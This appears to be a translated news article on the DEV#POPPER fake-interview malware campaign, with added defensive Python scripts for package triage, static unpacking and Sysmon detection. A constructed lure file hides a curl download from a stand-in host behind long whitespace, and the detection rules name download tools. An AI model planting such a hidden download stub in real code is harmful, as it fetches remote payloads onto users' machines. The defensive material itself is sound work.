Cybercriminals target developers with fake job interviews in an attempt to trick them into installing a Python backdoor, exploiting their trust in the application process

A new campaign, tracked by Securonix as DEV#POPPER, targets software developers with fake job interviews in an attempt to trick them into installing a Python remote access trojan (RAT). Developers are asked to complete tasks presented as part of the interview, such as downloading and running code from GitHub, so that the whole process looks legitimate. The threat actors’ real goal, however, is to get the target to run malware that collects system information and gives them remote access to the host. According to Securonix analysts, the campaign is probably the work of North Korean threat actors, although the evidence is not strong enough for a firm attribution.

Social engineering is a tactic used by cybercriminals to manipulate individuals into disclosing confidential information or taking actions they would not normally take. The attacker’s goal is to get the user to compromise themselves or their employer without realising it. Unlike attacks that rely on exploiting technical vulnerabilities, social engineering targets human weaknesses through psychological manipulation, playing on basic traits such as trust, fear or the simple desire to be helpful.

In the DEV#POPPER campaign observed by Securonix, the social engineering takes a more targeted form: it goes after a specific professional group, software developers. The technique is not extremely widespread at the moment, but it is far from new, and Securonix points out that it has been reported several times in the past as a tactic of North Korean threat actors.

In short, the attackers pose as legitimate recruiters and set up fake job interviews with developers. During these interviews, the candidates are asked to download and run software from sources that look legitimate, such as GitHub. The software contains a malicious Node.js payload that, once executed, compromises the developer’s system.

The method works because it leverages the developer’s professional commitment and trust in the application process: refusing to do what the interviewer asks could cost them the job. The attackers tailor their approach to look as credible as possible, often imitating real companies and copying real interview processes. This appearance of professionalism and legitimacy gives the target a false sense of security, which makes it easier to deploy malware without raising suspicion.

Multi-step infection chain

The attackers make contact posing as employers looking to fill software developer positions. During the interview, the candidate is asked to download and complete what is presented as a standard coding task from a GitHub repository. The download is a ZIP archive containing an NPM package, which includes a README.md file as well as frontend and backend directories.

The backend directory contains a single JavaScript file that, at first glance, looks like a simple snippet using Mongoose, a Node.js package for modelling MongoDB objects in an asynchronous environment.

A closer look, however, reveals one enormous line of heavily obfuscated code hidden off to the right of the editor window; its length is obvious from the horizontal scroll bar in the figure.

Pulling that JavaScript out of imageDetails.js into its own file makes it a little easier to read. The code is protected by several layers of obfuscation, including base64 encoding and variable substitution.


Once the developer runs the NPM package, the obfuscated JavaScript file (imageDetails.js) hidden in the backend directory executes and uses the Node.js process to run curl commands that download an additional archive (p.zi) from an external server.
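The practical lesson of this stage is that a take-home package should be read before it is run. The following script is an added example, not code from the Securonix report or from the campaign: it walks an unpacked npm-style package and flags the three traits described above, namely a single abnormally long line (packed or obfuscated code), process-spawning and download primitives in the JavaScript, and package.json lifecycle hooks that execute on `npm install` before anyone opens a file. The length threshold, the indicator list and the sample package it builds in a temporary directory are all this example’s own choices; the sample only mimics the layout of the lure.

```python
"""Pre-execution triage of a take-home coding package (added example).

Scans an unpacked npm-style directory for: very long single lines, code
execution / network primitives in JavaScript, and package.json lifecycle
hooks. Thresholds and indicators are this example's own assumptions.
"""
import json
import os
import re
import tempfile

# Strings that rarely belong in a small take-home app but are common in
# droppers: spawning processes, fetching remote code, eval-style execution.
SUSPICIOUS_JS = [
    r"\bchild_process\b", r"\bexec(?:Sync)?\s*\(", r"\bspawn(?:Sync)?\s*\(",
    r"\bcurl\b", r"\beval\s*\(", r"new\s+Function\s*\(",
    r"\batob\s*\(", r"Buffer\.from\([^)]*['\"]base64['\"]",
]
LONG_LINE = 2000            # chars; hand-written JS lines are normally far shorter
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def scan_js_file(path):
    """Return a list of (line_number, reason) findings for one JS file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if len(line) > LONG_LINE:
                findings.append((lineno, f"line of {len(line)} chars (possible packed payload)"))
            for pat in SUSPICIOUS_JS:
                if re.search(pat, line):
                    findings.append((lineno, f"matches {pat}"))
    return findings


def scan_package_json(path):
    """Flag lifecycle scripts: they run on install without anyone opening them."""
    with open(path, encoding="utf-8") as fh:
        data = json.load(fh)
    scripts = data.get("scripts", {})
    return [(hook, scripts[hook]) for hook in LIFECYCLE_HOOKS if hook in scripts]


def triage_package(root):
    """Scan every .js/.mjs/.cjs and package.json under root.

    Returns {relative_path (with '/' separators): findings} for files with hits.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name == "package.json":
                hits = scan_package_json(full)
            elif name.endswith((".js", ".mjs", ".cjs")):
                hits = scan_js_file(full)
            else:
                continue
            if hits:
                report[rel] = hits
    return report


def build_sample_package():
    """Write a constructed package mimicking the lure's layout (not the real malware)."""
    root = tempfile.mkdtemp(prefix="takehome_")
    os.makedirs(os.path.join(root, "backend"))
    os.makedirs(os.path.join(root, "frontend"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "image-service",
                   "scripts": {"postinstall": "node backend/imageDetails.js"}}, fh)
    with open(os.path.join(root, "backend", "imageDetails.js"), "w", encoding="utf-8") as fh:
        fh.write("const mongoose = require('mongoose');\n")
        fh.write("const ImageSchema = new mongoose.Schema({ name: String });\n")
        # Innocent-looking statement followed by a huge run of whitespace and
        # a download stub pushed far off-screen, as in the lure.
        fh.write("module.exports = mongoose.model('Image', ImageSchema);" + " " * 3000
                 + "const cp=require('child_process');"
                 + "cp.execSync('curl -o p.zi http://example.invalid/p');\n")
    with open(os.path.join(root, "frontend", "app.js"), "w", encoding="utf-8") as fh:
        fh.write("console.log('hello');\n")
    return root


if __name__ == "__main__":
    for path, hits in triage_package(build_sample_package()).items():
        print(path)
        for where, reason in hits:
            print(f"  {where}: {reason}")
```

Run it against an extracted interview archive before `npm install`: a hit on a lifecycle hook or a multi-thousand-character line in a "simple" backend file is reason enough to stop and ask the recruiter questions, not to run the code.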

The downloaded archive holds the payload for the next stage: an obfuscated Python script named .npl that functions as a RAT. The .npl file is a Python file with no extension; its name starts with a dot, which marks it as a hidden file on Unix-like systems. Depending on the operating system and its settings, the file may or may not be hidden from the user.

The file contains a large base64 payload and uses a combination of string manipulation and decoding to run the Python code hidden inside. The base64 decoding is combined with XOR logic to recover the encoded string, which is then executed as Python code with exec().
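When a loader decodes a blob and hands it to exec(), the analyst’s move is to reproduce the decoding without the exec(). The script below is an added example, not the .npl file or any code from the report: it pulls the large base64 literal out of a loader’s source text, decodes it, recovers a single-byte XOR key by scoring which candidate looks most like Python (a comment-only line parses too, so the score also counts top-level statements), and then lists the imports and calls of the recovered stage with the ast module, never running it. The sample loader and its key are constructed here; the report does not publish the key or say whether the real sample uses a single-byte one, so treat the brute force as a starting point rather than a guaranteed unpacker.

```python
"""Static unpacking of a base64 + XOR + exec() stage (added example).

Extract the base64 literal, decode it, brute-force a single-byte XOR key
by "looks like Python" scoring, and summarise the result with ast instead
of executing it. The sample loader at the bottom is constructed.
"""
import ast
import base64
import re
import string

B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")
PRINTABLE = set(bytes(string.printable, "ascii"))


def extract_b64_blobs(source):
    """Return every long base64-looking string literal in the source, decoded."""
    blobs = []
    for m in B64_LITERAL.finditer(source):
        try:
            blobs.append(base64.b64decode(m.group(1), validate=True))
        except ValueError:
            continue
    return blobs


def xor_bytes(data, key):
    """XOR data with a repeating key (bytes)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def score_python(text):
    """Printable ratio, plus a bonus if the bytes parse as Python that grows
    with the number of top-level statements (a single '#...' line parses too,
    so a bare parse check alone cannot pick the right key)."""
    printable = sum(1 for b in text if b in PRINTABLE) / max(len(text), 1)
    try:
        tree = ast.parse(text.decode("utf-8"))
    except (SyntaxError, ValueError):          # UnicodeDecodeError is a ValueError
        return printable
    return printable + 1.0 + 0.1 * len(tree.body)


def recover_single_byte_key(data):
    """Try all 256 single-byte keys; return (key, plaintext) with the best score."""
    best = max(range(256), key=lambda k: score_python(xor_bytes(data, bytes([k]))))
    return best, xor_bytes(data, bytes([best]))


def summarize(plaintext):
    """List imported modules and called names in the recovered stage, without running it."""
    tree = ast.parse(plaintext.decode("utf-8"))
    imports, calls = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom):
            imports.add(node.module or "")
        elif isinstance(node, ast.Call):
            calls.add(ast.unparse(node.func))
    return {"imports": sorted(imports), "calls": sorted(calls)}


def unpack_stage(source):
    """Decode every large base64 literal in a loader; one result dict per blob."""
    results = []
    for blob in extract_b64_blobs(source):
        key, plain = recover_single_byte_key(blob)
        try:
            summary = summarize(plain)
        except (SyntaxError, ValueError):
            summary = None                    # key recovery failed or not Python
        results.append({"key": key, "plaintext": plain, "summary": summary})
    return results


# Constructed sample: a benign stage encoded the same way (XOR, then base64),
# wrapped in a loader that would exec() it. The key is this example's choice.
SAMPLE_KEY = 0x5A
SAMPLE_STAGE = (
    "import platform, socket\n"
    "info = {'os': platform.system(), 'host': socket.gethostname()}\n"
    "print(info)\n"
).encode()
SAMPLE_LOADER = (
    "import base64\n"
    "_k = %d\n"
    "_p = '%s'\n"
    "exec(bytes(b ^ _k for b in base64.b64decode(_p)).decode())\n"
    % (SAMPLE_KEY, base64.b64encode(xor_bytes(SAMPLE_STAGE, bytes([SAMPLE_KEY]))).decode())
)

if __name__ == "__main__":
    for r in unpack_stage(SAMPLE_LOADER):
        print("key=0x%02x" % r["key"], r["summary"])
```

The summary alone (here: imports of platform and socket, calls to platform.system and socket.gethostname) already tells an analyst what the stage is for, which matches the fingerprinting behaviour described in the next section, and it does so without the stage ever touching the interpreter.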


Executing Python code

Securonix explains that the first decoded string is executed first: it collects information about the infected computer’s system and network, then sends that data to a remote server:

  • Operating system type
  • Hostname
  • Operating system version
  • Username of the logged-in user
  • A unique device identifier (uuid) generated by hashing the MAC address and the username

The second decoded and executed string is much longer than the first and contains many more features. Once executed, the script behaves as a RAT (Remote Access Trojan), letting the attacker interact remotely with the victim’s machine. After analysing the decoded part of the script, Securonix observed the following capabilities:

  • Network and session creation: establishes persistent TCP connections, including structuring and sending data in JSON format.
  • File system interaction: functions for browsing directories and filtering files by extension, with the ability to exclude directories. It can also locate, and potentially exfiltrate, files that do not match certain criteria (such as size and extension).
  • Remote command execution: several functions that run system shell commands and scripts, including browsing the file system and executing shell commands.
  • Data processing and transmission: encodes data sent over the established TCP connection, handles incoming data, decodes different character encodings, and manages transmission errors and timeouts.
  • Exfiltration and download: the Python script can send files to a remote FTP server, filtering them by extension. Other functions automate the process by collecting data from user directories such as Documents and Downloads.
  • Clipboard and keystroke capture: the script can monitor and exfiltrate clipboard contents and keystrokes.

Securonix recommendations

When it comes to social engineering, it is essential to keep a security-focused mindset, especially in intense and stressful situations such as job interviews. The attackers behind the DEV#POPPER campaign exploit exactly that, knowing that the person on the other end of the line is distracted and therefore far more vulnerable. For prevention and detection, the Securonix Threat Research team recommends the following:

  • Remember that people are targets of social engineering just as technology is the target of exploits. Staying vigilant and keeping security in mind even in high-stress situations is essential to prevent this kind of compromise.
  • For code execution, monitor malware staging directories, especially script-related activity in world-writable directories. In this campaign, the threat actors installed themselves in subdirectories under the user’s %APPDATA% directory.
  • Monitor the use of non-default scripting languages, such as Python, on endpoints and servers that would not normally run them. Additional process-level logging, such as Sysmon and PowerShell logging, broadens detection coverage.
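The last two recommendations translate directly into process-creation rules. The following is an added example (not Securonix’s own detection content) that runs a small rule set over Sysmon Event ID 1 style records: Python on a host not expected to run it, a script interpreter launching a file from a per-user %APPDATA% path, a hidden extension-less script argument such as .npl, and a download tool (curl, wget, certutil, bitsadmin) spawned by node.exe or python.exe. The allowlist PYTHON_HOSTS is hypothetical, and the events are constructed test records rather than real telemetry; only the field names (Image, CommandLine, ParentImage, Computer) follow Sysmon.

```python
"""Detection rules for DEV#POPPER-style activity over Sysmon process-creation
events (added example). Events are constructed; PYTHON_HOSTS is a hypothetical
allowlist of machines where running Python is expected."""
import re

PYTHON_HOSTS = {"build-01", "data-sci-07"}   # assumption: hosts where Python is normal

PYTHON_EXE = re.compile(r"(?:^|\\)python(?:3|w)?\.exe$", re.IGNORECASE)
NODE_EXE = re.compile(r"(?:^|\\)node\.exe$", re.IGNORECASE)
DOWNLOADERS = re.compile(r"(?:^|\\)(?:curl|wget|certutil|bitsadmin)\.exe$", re.IGNORECASE)
# Script launched from a per-user writable directory (the report cites %APPDATA%).
APPDATA_PATH = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)
# A hidden, extension-less script argument such as ".npl".
DOTFILE_ARG = re.compile(r"(?:^|[\\/\s])\.[A-Za-z0-9_-]+(?:\s|$)")


def evaluate(event):
    """Return the names of the rules this one event trips (empty list if none)."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    host = event.get("Computer", "")
    is_python = bool(PYTHON_EXE.search(image))
    is_interp = is_python or bool(NODE_EXE.search(image))
    hits = []
    if is_python and host not in PYTHON_HOSTS:
        hits.append("python_on_unexpected_host")
    if is_interp and APPDATA_PATH.search(cmd):
        hits.append("script_run_from_appdata")
    if is_interp and DOTFILE_ARG.search(cmd):
        hits.append("hidden_extensionless_script")
    if DOWNLOADERS.search(image) and (PYTHON_EXE.search(parent) or NODE_EXE.search(parent)):
        hits.append("interpreter_spawned_downloader")
    return hits


def triage(events):
    """Run every event through the rules; return {event_index: [rule, ...]} for hits only."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


SAMPLE_EVENTS = [  # constructed records in Sysmon Event ID 1 field names
    {"Computer": "build-01", "Image": r"C:\Python311\python.exe",
     "CommandLine": r"python.exe C:\ci\build.py",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Computer": "dev-laptop-42", "Image": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r"node backend\imageDetails.js",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Computer": "dev-laptop-42", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -o p.zi http://example.invalid/p.zi",
     "ParentImage": r"C:\Program Files\nodejs\node.exe"},
    {"Computer": "dev-laptop-42",
     "Image": r"C:\Users\dev\AppData\Local\Programs\Python\Python311\python.exe",
     "CommandLine": r"python.exe C:\Users\dev\AppData\Roaming\.npl",
     "ParentImage": r"C:\Program Files\nodejs\node.exe"},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Computer"], SAMPLE_EVENTS[idx]["Image"], rules)
```

The first two sample events (Python on a build host, node running the visible part of the take-home task) produce nothing, which is the point: the rules key on the chain described in the report, an interpreter pulling a second stage with curl and Python then running a dotfile out of %APPDATA% on a machine that has no business running Python. Tune PYTHON_HOSTS and the AppData pattern to the estate before deploying, or the first rule will page on every data scientist’s laptop.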

Conclusion

Although the actors behind the DEV#POPPER attack have not been identified with certainty, the tactic of using lures to infect people with malware remains widespread, and we should stay alert to the risk.

The researchers note that the method exploits the developer’s professional commitment and trust in the job application process, where refusing to carry out the interviewer’s requests could jeopardise the job opportunity, which makes it very effective. North Korean hackers have used the fake job offer tactic in numerous operations over the years to compromise targets on a variety of platforms.

Source: Securonix

And you?

What is your opinion on using job postings as bait to spread malware? Do you think this tactic is effective and why?

How can developers protect themselves against such attacks? Do you have any specific tips for verifying the authenticity of job offers and interviews?

What steps do you think companies should take to increase candidate safety during the recruiting process?

What other social engineering methods have you encountered in the field of cybersecurity? Share your experiences or knowledge.

Do you think attribution of attacks to specific threat actors is important? Why or why not?
